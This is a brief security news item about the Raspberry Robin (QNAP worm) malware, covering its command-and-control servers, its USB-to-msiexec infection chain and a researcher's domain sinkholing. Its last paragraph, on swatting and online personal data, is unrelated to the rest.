Numerous threat actors could repurpose Raspberry Robin, also known as QNAP worm, for their own attacks, reports The Hacker News.
Raspberry Robin, which has been attributed to DEV-0856, was discovered by SEKOIA researchers to have at least eight Linode-based virtual private servers acting as a second command-and-control layer on top of compromised QNAP network-attached storage devices.
Such attack infrastructure facilitates an attack chain that commences with the launch of a Windows shortcut file from an inserted USB drive that would enable the msiexec utility and later download the primary obfuscated Raspberry Robin payload. Researchers noted that malware retrieval through HTTP requests sent by msiexec allows request hijacking for other rogue MSI payload downloads.
"By pointing this domain to our sinkhole, we were able to obtain telemetry from one of the first domains used by Raspberry Robin operators," said SEKOIA, which added that the Raspberry Robin domain could still be reused for other malicious activities.
The rise of the internet and the enormous amounts of personal data – both public and stolen – about individuals that can now be found on the internet makes it easier than ever to identify a target, where they work and where they live. That can make attacks like swatting a relatively low-effort, high-impact form of harassment.